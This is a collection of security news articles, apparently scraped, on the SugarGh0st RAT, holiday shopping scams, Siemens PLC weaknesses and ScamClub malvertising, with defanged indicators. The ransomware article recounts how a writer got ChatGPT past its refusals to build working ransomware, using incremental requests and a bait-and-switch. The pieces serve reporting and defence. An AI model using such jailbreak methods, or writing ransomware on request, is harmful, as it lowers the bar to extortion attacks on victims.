A decade and a half after Gh0st RAT first appeared, the "SugarGh0st RAT" variant aims to make life sweeter for cybercriminals.

Source: Niday Picture Library via Alamy Stock Photo

A new variant of the infamous "Gh0st RAT" malware has been identified in recent attacks targeting South Koreans and the Ministry of Foreign Affairs in Uzbekistan.

The Chinese group "C.Rufus Security Team" first released Gh0st RAT on the open Web in March 2008. Remarkably, it's still in use today, particularly in and around China, albeit in modified forms.

Since late August, for instance, a group with strong Chinese links has been distributing a modified Gh0st RAT deemed "SugarGh0st RAT." According to research from Cisco Talos, this threat actor drops the variant via JavaScript-laced Windows shortcuts, while distracting targets with customized decoy documents.

The malware itself is still largely the same, effective tool it's ever been, though it now sports some new decals to help sneak past antivirus software.

**SugarGh0st RAT's Traps**

The four samples of SugarGh0st, likely delivered via phishing, arrive on targeted machines as archives embedded with Windows LNK shortcut files. The LNKs hide malicious JavaScript which, upon opening, drops a decoy document — targeted for Korean or Uzbek government audiences — and the payload.

Like its progenitor — the Chinese origin remote access Trojan, first released to the public in March 2008 — SugarGh0st is a clean, multitooled espionage machine. A 32-bit dynamic link library (DLL) written in C++, it begins by collecting system data, then opens up the door to full remote access capabilities.

Attackers can use SugarGh0st to retrieve any information they might desire about their compromised machine, or start, terminate, or delete the processes it's running. They can use it to find, exfiltrate, and delete files, and erase any event logs to mask the resulting forensic evidence. The backdoor comes fitted with a keylogger, a screenshotter, a means of accessing the device's camera, and plenty of other useful functions for manipulating the mouse, performing native Windows operation, or simply running arbitrary commands.

"The thing that's most concerning to me is how it's specifically designed to evade previous detection methods," says Nick Biasini, Cisco Talos' head of outreach. With this new variant, specifically, "they took effort to do things that would change the way that core detection would work."

It isn't that SugarGh0st has any particularly novel evasion mechanisms. Rather, minor aesthetic changes make it appear different from prior variants, such as changing the command-and-control (C2) communication protocol such that instead of 5 bytes, the network packet headers reserve the first 8 bytes as magic bytes (a list of file signatures, used to confirm a file's contents). "It's just a very effective way to try and make sure that your existing security tooling isn't going to pick up on this right away," Biasini says.

**Gh0st RAT's Old Haunts**

Back in September 2008, the office of the Dalai Lama approached a security researcher (no, this isn't the beginning of a bad joke).

Its employees were being peppered with phishing emails. Microsoft applications were crashing, without explanation, across the organization. One monk recalled watching his computer open Microsoft Outlook all on its own, attach documents to an email, and send that email to an unrecognized address, all without his input.

A Gh0st RAT beta model's English-language UI. Source: Trend Micro EU via Wayback Machine

The Trojan used in that Chinese military-linked campaign against Tibetan monks has stood the test of time, Biasini says, for a few reasons.

"Open source malware families live long because actors get a fully functional piece of malware that they can manipulate as they see fit. It also allows people who don't know how to write malware to leverage this stuff for free," he explains.

Gh0st RAT, he adds, stands out in particular as "a very functional, very well-built RAT."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

A New, Spookier Gh0st RAT Malware Haunts Global Cyber Targets

ChatGPT 4.0 can write basic working ransomware in minutes.

This morning I decided to write some ransomware, and I asked ChatGPT to help. Not because I wanted to turn to a life of crime, but because I wanted to see if anything had changed since March, when I last tried the same exact thing.

In short: ChatGPT has helped me, worryingly so. But more on that later.

Today is the first anniversary of the unveiling of OpenAI’s generative AI poster boy, ChatGPT. It’s also the first anniversary of the tsunami of bloviation that the chatbot’s unveiling created. For months following ChatGPT’s release, the cybersecurity press was drenched in speculation about how cybercrime was changed forever, even though it didn’t appear to have changed at all.

By March, I’d read more baseless assertions than I knew what to do with, so I decided to find out for myself if ChatGPT was any good at malware. I wanted to know if its safeguards would stop me from using it to write ransomware, and, if they didn’t, whether the ransomware it produced was any good.

Despite its insistence that “I cannot engage in activities that violate ethical or legal standards, including those related to cybercrime or ransomware,” the safeguards proved to be almost no barrier at all. I was able to fool it into helping me with little effort. However, the code it produced was terrible: It stopped randomly in a places that guaranteed it would never run, switched languages randomly, and quietly dropped older features while writing new ones.

I concluded that an unskilled programmer would be baffled, while a skilled one would have no use for it. The prospect of ChatGPT lowering the barrier to entry into this lucrative form of cybercrime just wasn’t worth worrying about.

As of this morning, I’ve changed my mind.

One of the novel things about ChatGPT is that you can iterate your way to a solution by having a back-and-forth discussion with it. In March I used this approach with ChatGPT 3.0 to build up a basic ransomware step-by-step. The approach was sound but the resulting code would have never worked. I decided to take the same approach again today, using the current version of ChatGPT, 4.0, to better understand what’s changed.

The TL;DR is that everything’s changed. The limitations that made GPT 3.0 a useless partner in cybercrime are gone. ChatGPT 4.0 will help you write ransomware and train you to debug it, without a hint of conscience.

This is a basic ransomware it wrote for me encrypting the contents of two directories and leaving ransom notes behind.

Ransomware written by ChatGPT 4.0 encrypts files in two directories and leaves a ransom note

This isn’t a fully featured ransomware but it has the basics. It encrypts files in whatever directory tree I choose, throws away the originals, hides the private key used for the encryption, stops running databases, and leaves ransom notes. The code used in the demonstration above was generated by ChatGPT in mere minutes, without objection, in response to basic one line descriptions of ransomware features, even though I’ve never written a single line of C code in my life.

For obvious reasons I won’t be providing a step-by-step recipe, but the process started by asking for a program that encrypts a single file.

ChatGPT 4.0 writes a C program to encrypt a single file

Then I modified it to encrypt a directory instead of a file. Subsequent functionality was layered on like this, with incremental modificaitons, to see if ChatGPT ever took a step that made it realise it was writing something malicious. It didn’t.

ChatGPT 4.0 modifies its program to encrypt a directory

ChatGPT seemed unable to determine that what we were doing was writing ransomware, so right at the end of the process I thought I would give it a massive clue and see if the penny finally dropped. The last thing I asked it to do was a signature move for ransomware and something no legitmiate program does. I instructed it to modify its code to “drop a text file in encrypted directories called ‘ransom note.txt’ which contains the words ‘all your files are belong to us’ and an ascii art skull.”

While there are still quesiton marks over its ability to draw skulls, there can be none about its willingness to drop ransom notes.

ChatGPT 4.0 writing code to drop ransom notes with ASCII art skuls

My attempts to turn the chatbot to the dark side eight months ago were thwarted by its inability to hold all the information it needed to, or to write long answers. I likened asking ChatGPT 3.0 to help with a complex problem to working with a teenager: It does half of what you ask and then gets bored and stares out the window.

I encountered no such problems today. The bored teenager is gone, replaced by a verbose and enthusiastic straight-A student. At the very beginning I asked it to write its answers in C, and it never wavered. If it ever provided partial answers it would explain it was doing so, and offer a subset of code that made sense, such as a complete function. If I didn’t want a partial answer I would tell it, and then ask it to write out the entire program, including all the modifications we’d discussed up to that point.

It is, frankly, astonishingly helpful and powerful, and the importance of this can’t be overstated.

ChatGPT 4.0 agreeing to write out a complete program instead of snippets (ChatGPT’s answer is truncated)

**Safeguards removed**

Although I was able to work around ChatGPT’s insistence it wouldn’t write ransomware in March, I was often met with other restrictions that attempted to stop me doing unsafe things.

The latest version of ChatGPT seems to be far more relaxed. For example, in March it initially refused when I asked it to modify my ransomware code to delete the original copies of files it was encrypting. It was “a sensitive operation that could lead to data loss,” it claimed, telling me “I cannot provide code that implements this behaviour.” There was a workaround (there always is) but at least it tried.

This time I was met with no such objection. “Sure,” said ChatGPT 4.0.

ChatGPT 4.0 showed no reluctance to delete files it was encrypting

A similar thing happened when I asked it to save the private encryption key to a remote server. This is an important feature for ransomware because the private key is ultimately what vicitms pay for, so it can’t be left on the victim’s machine.

ChatGPT 3.0 refused to move the key to a remote server, saying it “goes against security best practices.” I couldn’t persuade it and ended up having to fool it with a bait-and-switch approach of writing something I didn’t want and then having it rewrite that into what I did want.

ChatGPT 4.0 on the other hand, was content to do no more than warn me it was “very risky.”

ChatGPT 4.0 had no objection to saving the private encryption key to a remote server

**Programming tutor**

Much to my surprise, after telling ChatGPT what features I wanted in my ransomware I was left with something that looked very much like a complete computer program. To be sure though, I had to actually run it and encrypt some files. And that’s where ChatGPT did something I wasn’t expecting.

C code is compiled, which means that once it’s been written it has to has to be run through a computer program called a compiler, which transforms it into an executable file. Compilation is a complex and often fragile process that can break easily, for any number of reasons. As a result, troubleshooting problems during the compilation phase can be extremely frustrating and time consuming.

Typically, it involves a lot of Googling and sifting through accounts of similar failures on sites like Stack Overflow. Problems can be caused by any number of things, including the code itself, dependencies like code libraries, and the choice of compiler. And numerous different errors can often trigger the same failure in compilation, so troubleshooting is as much an art as it is a science.

Sure enough, I hit a variety of hurdles during compilation.

However, instead of turning to Google, I turned to ChatGPT. Every time I ran into an error I told it what had happened, and based on the bare minimum of information it provided an explanation for what was going on, and advice on how to fix it. When its solutions didn’t work first time, it revised its approach and found a different answer.

ChatGPT 4.0 makes its first attempt at troubleshooting a compilation problem

ChatGPT 4.0 makes its second attempt at troubleshooting a compilation problem

ScreChatGPT 4.0 makes its third attempt at troubleshooting a compilation problemenshot

In every case, ChatGPT solved the problem, and in doing so it enabled me, a non-C programmer to write and troubleshoot basic but functional ransomware written in C, in almost no time.

To me, this ability to troublshoot compilation problems with minimal information is even more impressive than its ability to write code (and its ability to write code is jaw-droppingly impressive). Not only did it condense what could have been days of thankless work into an hour or two, it was coaching me as it did. I didn’t just finish with a working ransomware executable, I finished as a better programmer than I was when I started.

**Should we be worried?**

In a word, yes. Eight months ago I concluded that “I don’t think we’re going to see ChatGPT-written ransomware any time soon.” I said that for two reasons: Because there are easier ways to get ransomware than by asking ChatGPT to write it, and because its code had so many holes and problems that only a skilled programmer would be able to deal with it.

ChatGPT has improved so much in eight months that only one of those things is still true. ChatGPT 4.0 is so good at writing and troubleshooting code it could reasonably be used by a non-programmer. And because it didn’t raise a single objection to any of the things I asked it to do, even when I asked it to write code to drop ransom notes, it’s as useful to an evil non-programmer as it is to a benign one.

And that means that it can lower the bar for entry into cybercrime.

That said, we need to get things in perspective. For the time being, ransomware written by humans remains the preeminent cybersecurity threat faced by businesses. It is proven and mature, and there is much more to the ransomware threat than just the malware. Attacks rely on infrastructure, tools, techniques and procedures, and an entire ecosystem of criminal organisations and relationships.

For now, ChatGPT is probably less useful to that group than it is to an absolute beginner. To my mind, the immediate danger of ChatGPT is not so much that it will create better malware (although it may in time) but that it will lower the bar to entry in cybercrime, allowing more people with fewer skills to create original malware, or skilled people to do it more quickly.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 Will ChatGPT write ransomware? Yes. 

Fake Facebook ads seem to be the flavor of the month for scammers.

Thursday, November 30, 2023 14:00

I know I’m a little late to the party to hit the prime SEO for Black Friday, Cyber Monday and holiday shopping. But if I know the readers of this newsletter, everyone is far from done with their holiday shopping already after a few days. 

I also know I’m far from the only person to warn consumers about scams during this season, so I’m trying to split the difference and highlight a few specific scams and spam campaigns that are already circulating in the wild, some of which popped up right on Black Friday, so you don’t get caught in the remaining days leading up to the winter holidays. 

Fake Facebook ads seem to be the flavor of the month for scammers. This is completely anecdotal, but my mom almost got “got” with a fake Facebook post in a group she belongs to claiming to have some great deals on Nintendo Switch games on Amazon that were not actually real (thankfully she hadn’t clicked the link before she asked me if “Mario Odyssey” was a good deal at $15).  

Still, several other reports have shown that scammers are using Facebook ads to advertise a deal for a $19 Stanley cup — these are the water bottles all the influencers are using nowadays and, even when they are on sale, don’t go for any less than about $35. In this case, it looks like the actors are just looking to take your money or credit card information with a fake ordering process and no plans to send you anything. 

Adversaries have also set up fake Facebook pages and web pages disguising themselves as the retailer Big Lots. These fake ads and posts offer vague deals and sales on various products but instead point to typo-squatted Big Lots websites (or URLs that vaguely seem like they could be connected to Big Lots).  

Scammers are also sending mass emails to subscribers of various streaming services like Amazon Prime, Paramount+ and Peacock claiming that their subscription has lapsed, but they can resubscribe for a deeply discounted price, or even free, as part of a Black Friday special.  

Amazon also issued a warning recently that attackers have been sending emails with malicious attachments asking for users' personal information in exchange for having their “accounts” unlocked. 

This is just a sampling of the likely hundreds of different scams and spam campaigns attackers are deploying right now, so in general, when shopping online, here are a few tips: 

*   Only download apps from trusted and official app stores like the Google Play store and iOS App Store. 
*   Look out for apps that ask for suspicious permissions, such as access to your text messages, contacts, stored passwords and administrative features. 
*   Some malicious apps will try to masquerade as a legitimate version of the one you could be searching for. Signs of these apps include poor spelling and grammar in app descriptions and interfaces, lack of high-quality performance and a developer contact that uses a free email service (such as @gmail.com). 
*   Avoid clicking on unsolicited emails. Make sure you purposefully subscribed to any marketing emails you receive from retailers before opening it. 
*   Use an ad blocker locally on your browser. These will often block any malvertising campaigns that aim to capitalize on shoppers looking for deals. 
*   Try to use payment services such as Google Pay, Samsung Pay and Apple Pay. These services use tokenization instead of the “Primary Account Number” (your credit card number), making your transaction more secure. 
*   Use unique, complex passwords, per site. Attackers commonly reuse passwords to compromise multiple accounts with the same username. Use a password locker if you have a hard time creating and remembering secure passwords. 
*   Manually type in URLs to sites you want to visit rather than clicking on links. 
*   Use multi-factor authentication, such as Cisco Duo, to log into your email account to avoid unauthorized access. 

Next week, Talos will have a holiday special of our own! On Dec. 5, we’ll be launching our second-ever Year in Review report, complete with all new data and insights about the attacks and malware we’ve seen in 2023. Stay tuned to our social media channels or blog for that release.  

**The one big thing **

Cisco Talos recently discovered a malicious campaign that likely started as early as August 2023, delivering a new remote access trojan (RAT) we dubbed “SugarGh0st.” We assess with high confidence that the SugarGh0st RAT is a new customized variant of Gh0st RAT, an infamous trojan that’s been active for more than a decade, with customized commands to facilitate the remote administration tasks as directed by the C2 and modified communication protocol based on the similarity of the command structure and the strings used in the code. 

**Why do I care? **

If infected, SugarGh0st serves as a fully functional backdoor for the adversary that can execute most remote-control functionalities. It can launch the reverse shell and run the arbitrary commands sent from C2 as strings using the command shell. SugarGh0st can collect the victim’s machine hostname, filesystem, logical drive, and operating system information. It can access the running process information of the victim’s machine and control the environment by accessing the process information and terminating the process as directed by the C2 server. It can also manage the machine’s service manager by accessing the configuration files of the running services and can start, terminate or delete the services. 

**So now what? **

Since this seems to be an offshoot of GhostRAT, we certainly can’t rule out any other variants that may be floating out there. Talos also has new ClamAV signatures, Snort rules and other Cisco Secure protection to specifically detect and stop SugarGh0st.  

**Top security headlines of the week **

**Cisco Talos and other teams across Cisco recently worked with multiple government partners to help protect the Ukrainian power grid and ensure it runs appropriately.** The effort, spearheaded by Talos’ Joe Marshall, involved creating bespoke hardware for Ukraine’s energy supplier, Ukrenergo, to operate in place of traditional GPS devices that the Ukrainian power grid relies on to keep running on time. GPS satellites and Ukrainian substations have constantly been the target of kinetic and cyber threats during Russia’s invasion of Ukraine. Officials from multiple U.S. government agencies assisted in the project.  The Pentagon set up flights to physically deliver the manipulated switches, the Department of Energy helped coordinate the equipment’s delivery, and, as Ukrenergo told CNN, the Department of Commerce was a part of critical meetings that first outlined this project. Taras Vasyliv, who oversees power dispatching for Ukrenergo, told CNN that the custom-built switches were the equivalent of a “flashlight” for a surgeon who is trying to operate in the dark. (CNN, Business Insider) 

**Leaked government documents show that some local, federal and state law enforcement officers have been able to view the phone records of millions of Americans,** even those who have not been accused or suspected of a crime. The little-known Pentagon program was partially uncovered because of a letter sent from U.S. Sen. Ron Wyden of Oregon to U.S. Attorney General Merrick Garland, in Wyden’s office requested more information on the project and encouraged the federal government to publicly disclose this knowledge. The letter states the White House pays wireless company AT&T to give all federal, state, local, and Tribal law enforcement agencies “the ability to request often-warrantless searches.” Known as the “Hemisphere Project,” this program has apparently been around since 2007 and reported on by the New York Times in 2013 but has largely gone unnoticed since. Wyden is attempting to challenge the legality of the Hemisphere Project. (Wired) 

**Security researchers have found a way to bypass the Microsoft Hello login authentication system** used in many fingerprint readers and face ID scanners on devices from Dell, Lenovo and Microsoft. Researchers hired by Microsoft to test the security of the readers have since informed the company of these vulnerabilities. The attack the researchers outlined could provide access to a stolen laptop or carry out what's called an “evil maid” attack on an unattended device. Microsoft introduced Hello with its Windows 10 operating system, and since then has included fingerprint scanners on all its devices (though in some cases, Microsoft’s own hardware like the Surface tablet did not use Hello). Though the manufacturers are now aware of these vulnerabilities, the variety of attacks means it can be difficult to patch for these issues. However, all the attacks ultimately required physical access to a device. (Ars Technica, The Verge) 

**Can’t get enough Talos? **

*   Tech giant Cisco built special device to help Kyiv ward off cyberattacks on power grid 
*   Cisco whips up modded switch to secure Ukraine grid against Russian cyberattacks 
*   Talos Takes Ep. #163: Why has the Phobos ransomware been working for so long? 
*   The Need to Know: What is threat hunting? 
*   Vulnerability Roundup: Vulnerabilities in Adobe Acrobat, Microsoft Excel could lead to arbitrary code execution 

**Upcoming events where you can find Talos **

**"Power of the Platform” by Cisco** **(Dec. 5 & 7)** 

Virtual (Please note: This presentation will only be given in German) 

> _The annual IT event at the end of the year where Cisco experts, including Gergana Karadzhova-Dangela from Cisco Talos Incident Response, discuss the future-oriented topics in the implementation of digitalization together with you._  

**What Threats Kept Us Up in 2023: A Year in Review and a Look Ahead** **(Dec. 13, 11 a.m. PT)** 

Virtual 

> _Each year brings new threats that take advantage of increasingly complex security environments. Whether it’s Volt Typhoon targeting critical infrastructure organizations across the United States or ALPHV launching an attack against casino giant MGM, threat actors are becoming bolder and more evasive. That’s why it’s never been more important to leverage broad telemetry sources, deep network insights and threat intelligence to respond effectively and recover faster from sophisticated attacks. Join Amy Henderson, Director of Strategic Planning and Communications at Cisco Talos and Briana Farro, Director of XDR Product Management at Cisco, as they discuss some of the top threat trends and threats we have seen this past year and how to leverage security technology like XDR and network insights to fight against them._ 

**NIS2 Directive: Why Organizations Must Act Now to Ensure Compliance and Security** **(Jan. 11, 2024, 10 a.m. GMT)** 

Virtual 

> _The NIS2 Directive is a crucial step toward securing Europe’s critical infrastructure and essential services in an increasingly interconnected world. Organizations must act now to prepare for the new requirements, safeguard their operations, and maintain a robust cybersecurity posture. Gergana Karadzhova-Dangela from Cisco Talos Incident Response and other Cisco experts will talk about how organizations can best prepare for the coming regulations._  

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 8664e2f59077c58ac12e747da09d2810fd5ca611f56c0c900578bf750cab56b7    
**MD5:** 0e4c49327e3be816022a233f844a5731    
**Typical Filename:** aact.exe    
**Claimed Product:** AAct x86    
**Detection Name:** PUA.Win.Tool.Kmsauto::in03.talos 

**SHA 256:** 77c2372364b6dd56bc787fda46e6f4240aaa0353ead1e3071224d454038a545e   
**MD5:** 040cd888e971f2872d6d5dafd52e6194   
**Typical Filename:** streamer.exe   
**Claimed Product:** Ultra Virus Killer   
**Detection Name:** PUA.Win.Virus.Ultra::95.sbx.tg 

**SHA 256:** abaa1b89dca9655410f61d64de25990972db95d28738fc93bb7a8a69b347a6a6   
**MD5:** 22ae85259273bc4ea419584293eda886   
**Typical Filename:** KMSAuto++ x64.exe   
**Claimed Product:** KMSAuto++   
**Detection Name:** Hacktool:PUP.26ld.in14.Talos 

**SHA 256:** 77c2372364b6dd56bc787fda46e6f4240aaa0353ead1e3071224d454038a545e   
**MD5:** 040cd888e971f2872d6d5dafd52e6194   
**Typical Filename:** tmp000c3787   
**Claimed Product:** Ultra Virus Killer   
**Detection Name:** PUA.Win.Virus.Ultra::95.sbx.tg 

**SHA 256:** 975517668a3fe020f1dbb1caafde7180fd9216dcbf0ea147675ec287287f86aa   
**MD5:** 9403425a34e0c78a919681a09e5c16da   
**Typical Filename:** vincpsarzh.exe   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::tpd

$19 Stanely cups, fake Amazon Prime memberships all part of holiday shopping scams circulating

Security updates are tedious and difficult, so users continue to use a weak version of a core protocol and remain exposed to major attacks on critical infrastructure.

Source: John Edwards via Alamy Stock Photo

Programmable logic controllers (PLCs) that were vulnerable to the Stuxnet attack are still in use globally and rarely have security controls deployed — meaning they're still at risk.

More than 10 years after Stuxnet, new research shows users rarely switch on security controls such as using passwords, and feel updates are too cumbersome to be applied.

Colin Finck, tech lead of reverse engineering and connectivity at Enlyze, says the Siemens proprietary protocol which is used to read and write data as well as to program the S7 PLC. However, this is only protected by obfuscation, which the researchers were able to bypass.

Finck and his colleague Tom Dohrmann, software engineer, reverse engineering and connectivity, will present their findings at Black Hat Europe in London next week, in a talk titled "A Decade After Stuxnet: How Siemens S7 Is Still an Attacker's Heaven."

**Still Feeling the Stuxnet Effects**

In the 2010 attack, the Stuxnet attackers exploited several zero-day vulnerabilities in Microsoft Windows to ultimately gain access to Siemens software and the PLCs. This was done to gain access to and effectively damage high-speed centrifuges at the Iranian Bushehr nuclear power plant.

The impact of Stuxnet was huge, as it remotely damaged around a thousand centrifuges, and the worm's controllers were also able to analyze communication protocols between the PLCs to exploit further technological weaknesses. It also paved the way for things to come: After Stuxnet, a number of industrial control-related attacks were detected over the years, including BlackEnergy and Colonial Pipeline.

Finck tells Dark Reading that after the Stuxnet attacks took place, Siemens developed a revised protocol for the PLCs that added "lots of obfuscation and cryptography layers." However, the researchers in recent probing were able to bypass that obfuscation to give them the ability to read and write instructions for the PLCs, and ultimately stop the controller working in a proof of concept.

A statement from Siemens sent to Dark Reading acknowledged that the levels of obfuscation do not offer enough security, and a Security Bulletin from October 2022 stated that two of the PLCs "use a built-in global private key which cannot be considered anymore as sufficiently protected."

The statement added: "Siemens has deprecated this previous version of the communication protocol and encourages everyone to migrate to V17 or later to enable the new TLS \[Transport Layer Security\]-based communication protocol."

**Improved Firmware**

That most recent Siemens firmware released in 2022 does include TLS, but Finck claims there is no "long-term service for cybersecurity issues" and calls for Siemens to provide better means to update firmware "because right now, it's wide open to anybody who could just access it over the Internet."

In its statement, Siemens said it is aware of the talk scheduled for Black Hat Europe and stated that the talk "will describe the details of the legacy PG/PC and HMI communication protocol as used between TIA Portal/HMIs and SIMATIC S7-1500 SW Controller in versions before V17."

The company stated that no previously unknown security vulnerabilities will be disclosed in this talk and that Siemens is in close coordination with the researchers. Siemens recommended users to apply mitigations, including:

*   Applying client authentication using strong and individual access level passwords.
    
*   Migrating to V17 or later to enable the new TLS-based communication protocol for all SIMATIC S7-1200/1500 PLCs including SW Controller (see Siemens Security Bulletin SSB-898115 \[2\]).
    
*   Implementing the defense-in-depth approach for plant operations and configure the environment according to Siemens operational guidelines for industrial security.
    

Though the researchers praised the response by Siemens, they noted that PLC firmware is rarely updated by users, "and there's not an established update process to quickly roll out \[updates\] to a fleet of machines."

Finck says doing updates is "probably a tedious manual process to walk to every machine, plug something in and update the firmware," and thus, Siemens needs to offer better update processes so customers have an incentive to deploy those updates.

In the meantime, he says, "you better not have a direct connection to all PLCs right now, due to the aforementioned security problems."

**About the Author(s)**

With more than 20 years experience of B2B journalism, including 12 years covering cybersecurity, Dan Raywood brings a wealth of experience and information security knowledge to the table. He has covered everything from the rise of APTs, nation-state hackers, and hacktivists, to data breaches and the increase in government regulation to better protect citizens and hold businesses to account. Dan is based in the U.K., and when not working, he spends his time stopping his cats from walking over his keyboard and worrying about the (Tottenham) Spurs’ next match.

Siemens PLCs Still Vulnerable to Stuxnet-like Cyberattacks

A fake antivirus alert may suddenly hijack your screen while browsing. This latest malvertising campaign hit top publishers.

ScamClub is a threat actor who’s been involved in malvertising activities since 2018. Chances are you probably ran into one of their online scams on your mobile device.

Confiant, the firm that has tracked ScamClub for years, released a comprehensive report in September while also disrupting their activities. However, ScamClub has been back for several weeks, and more recently they were behind some very high profile malicious redirects.

The list of affected publishers includes the Associated Press, ESPN and CBS, where unsuspecting readers are automatically redirected to a fake security alert connected to a malicious McAfee affiliate.

ScamClub is resourceful and continues to have a deep impact on the ad ecosystem. While we could not identify precisely which entity served the ad, we have reported the website used to run the fake scanner to Cloudflare which immediately took action and flagged it as phishing.

**Forced redirects**

Mastodon user Blair Strater (@r000t@fosstodon.org) was simply browsing the Associated Press website on his phone when he was suddenly redirected to a fake security scan page:

Malicious redirect from APnews.com (credit Blair Strater)

This fake scanner is not run by McAfee, but the domain name _systemmeasures\[.\]life_ that we see in the address bar is the landing page that redirects to one of its affiliates. That affiliate was previously reported but continues unabated.

Web traffic between malicious page and McAfee site

Based on public data, several ad exchanges were abused to deliver this fake antivirus campaign via real-time bidding (RTB) in the past few weeks Most of the telemetry we saw from our Malwarebytes user base was related to smaller websites with ‘risky’ advertisers. However, a different campaign was targeting mobile users with malicious ads slipping by on top publishers (note: this data comes from VirusTotal):

**ESPN.COM (1.585B monthly visits)**

systemmeasures\[.\]life/avs/en/mob/**mcafee-2**.php?c=5uz3hbaiz7oz2&k=b47648817b492be8ba9c7dc97addefb6&country\_code=US&carrier=Verizon&country\_name=United%20States&region=New%20York&city=Bronx&isp=MCI%20Communications%20Services,%20Inc.%20d/b/a%20Verizon%20Business&lang=en&ref\_domain=**www.espn.com**&os=**iOS**&osv=17&browser=Chrome&browserv=119&brand=Apple&model=iPhone&marketing\_name=iPhone&tablet=2&rheight=0&rwidth=0&e=5

**APNEWS.COM (307.2M monthly visits)**

systemmeasures\[.\]life/avs/en/mob/**mcafee-2**.php?c=59z40b4g6z7oz2&k=506222e0611d62c3261b9ba847063faa&country\_code=US&carrier=-&country\_name=United%20States&region=Virginia&city=Alexandria&isp=Comcast%20Cable%20Communications,%20LLC&lang=en&ref\_domain=**apnews.com**&os=**Android**&osv=10.&browser=Chrome&browserv=119&brand=unknown&model=unknown&marketing\_name=K&tablet=2&rheight=0&rwidth=0&e=5

**CBSSPORTS.COM (265.1M monthly visits)**

systemmeasures\[.\]life/avs/en/mob/**mcafee-2**.php?c=5uz16jptz7oz2&k=d2761f12fed2ce8472ab704fd55d49e1&country\_code=US&carrier=-&country\_name=United%20States&region=Colorado&city=Greenwood%20Village&isp=Charter%20Communications%20Inc&lang=en&ref\_domain=**www.cbssports.com**&os=**Android**&osv=10.&browser=Chrome&browserv=119&brand=unknown&model=unknown&marketing\_name=K&tablet=2&rheight=0&rwidth=0&e=5

Most of the public reports (\[1\], \[2\], \[3\]) indicate this campaign was at its peak around **November 19**. To be clear, AP, ESPN, CBS and other sites were not hacked, but rather showed malicious ads. It appears that this high profile campaign stopped shortly after, as we haven’t seen new telemetry data coming from these publishers. However, the other campaign we are also monitoring that is affecting smaller sites is still ongoing (via _eu\[.\]vulnerabilityassessments.life_ and _us.vulnerabilityassessments\[.\]life_).

**Connection with ScamClub**

We were able to connect this campaign to the ScamClub infrastructure because of another domain (_trackmaster\[.\]cc_) that was previously mentioned as belonging to the threat actor. We can see the relationship between _systemmeasures\[.\]life_ (the landing page) and _trackmaster\[.\]cc_ (the intermediary domain) in the urlscanio submission below:

urlscanio scan showing the relationship between two domains

**Fingerprinting**

Like other malvertising threat actors, ScamClub dabbles in obfuscation and evasion techniques. However, as previously detailed by Confiant, they are using much more advanced tricks. Their JavaScript uses obfuscation with changing variable names, making identification harder.

Previously, the malicious JavaScripts were hosted on Google’s cloud but they have now moved to Azure’s CDN.

ScamClub’s malicious JavaScript

**Malvertising and mobile users**

On this blog, we have covered a number of malvertising campaigns targeting Desktop, both consumer and enterprise. This is in part because we hunt for Windows malware and the occasional Mac ones too.

ScamClub is a good example of targeting a big market segment, Mobile Web, where security software is often an afterthought, in particular on iOS, in part due to restrictions imposed by Apple. Clearly, malvertising is flourishing on Mobile and users are just as likely, if not more, to get tricked into downloading malware or get scammed.

Malwarebytes for Android protects users from this campaign:

**Indicators of Compromise**

**ScamClub URLs**

octob\[.\]azureedge\[.\]net/oc.js
lzi\[.\]azureedge\[.\]net/lz.js
tinlc\[.\]azureedge\[.\]net/pt.js
bm-rb\[.\]azureedge.net/rb.js
foluo\[.\]azureedge\[.\]net/fo.js
vpv-ger\[.\]azureedge\[.\]net/VpaidVideoAd1.js

**ScamClub JavaScript hashes**

c01716e23f633b206147efbe70fb37945e3857d6575fd088ea50106fb541cf1e  
899cbfbd676159201b2281d9e0e66f3ac200ac58b674375bde04083ff87650ad  
451b48c8f247f25cd09a1bf4a52fc195a74830d88bd2ffed7a5d4b7830e10621  
495304b489cecd33188ca2a7407d397996fd82ea99966e7c145f0dc67ab2dfb5  
a616fc2c1a075170d4decdb9d3c9ad15f2cfbcfda78dbe4c60d72132b9d006c9  
34f15ec739df72f5ac245db3fff11ea56407e95b94e24bbb820d7999032866d8  
a7a73d3bc716346808b2ee8070dfe5842bb01e10aee1fa9ba87fb975d71d0f4f  
de2f1745cdfbe58266b804961bdbd5be8f533843ed7fdf4b5fe6eb0060876b56  
1614786dd6ff4189975e8226ab7e68d258817b435c3c4e145951f5147699878e  
52cd9f2ff282354c77087b204d5cb32cee9066e8eea4e3c3b8f7cf4d3d3fa20f  
df03df284bfbbe006383f26c0c91394f4c4c8d915d04b868a00954f63e6163e0  
2f3867d33c448b941278671df9a2b8d3d6b29dec5d74b67654f5edfcc6771575  
243d9d70703644f3df148e7633f3ec461a9c43149ea58fd547e2e6fd0c47cce5

**Redirectors**

trackmaster\[.\]cc  
protectsystemtools\[.\]life  
securitypatch\[.\]life  
real-time-system-monitoring\[.\]life  
threatdetectorhub\[.\]life  
threatdetectorhub\[.\]online  
vulnerabilityassessments\[.\]life  
strike-it-lucky\[.\]space  
golden-opportunity\[.\]xyz  
stroke-of-luck\[.\]xyz  
blessed-with-luck\[.\]space  
system-scan-tool\[.\]space  
system-security-scan\[.\]buzz  
system-security-scan\[.\]net  
system-scan-tool\[.\]online  
